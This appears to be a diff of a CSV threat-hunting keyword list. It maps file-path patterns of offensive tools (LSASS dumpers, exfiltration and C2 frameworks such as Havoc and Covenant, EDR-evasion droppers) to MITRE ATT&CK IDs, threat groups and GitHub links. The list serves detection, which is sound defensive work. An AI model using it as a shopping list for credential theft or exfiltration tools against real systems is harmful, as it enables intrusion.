-"*\DocsPLZ.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\DllExport.bat*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*\DllVoidFunction.txt*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*\DocsPLZ.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\DocsPLZ.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" "*\DoHC2.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" -"*\DomainRecon\*.txt","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*\donut.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*\donut\VanillaProgram.bin*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*\DomainRecon\*.txt","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\donut.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*\donut\VanillaProgram.bin*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*\Doraemon*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*\duedlligence.dll*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","10","5","441","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" -"*\dumper.ps1*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","262","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" -"*\dumpert.*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*\Dumpert\*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*\drop-sc.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\duedlligence.dll*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*\dumper.ps1*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*\dumpert.*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*\Dumpert\*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*\DumpShellcode*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","0","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*\dumpXor.exe*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*\dumpXor\x64\*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*\ebowla.py*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" -"*\EDD.exe","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*\EDD.exe","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*\edraser.py*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" "*\Egress-Assess*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*\Ekko.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*\elevateit.bat*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*\Ekko.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\elevateit.bat*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*\ELF\portscan*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*\ELF\serverscan*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" -"*\Elite.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*\Elite.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*\Elite.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*\Elite.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*\emailall.py*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"*\empire_exec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\enc_shellcode.bin*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*\enc_shellcode.h*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*\enum_av.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\enum_dns.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\ES.Alan.Core*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*\EternalHushCore.dll*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" 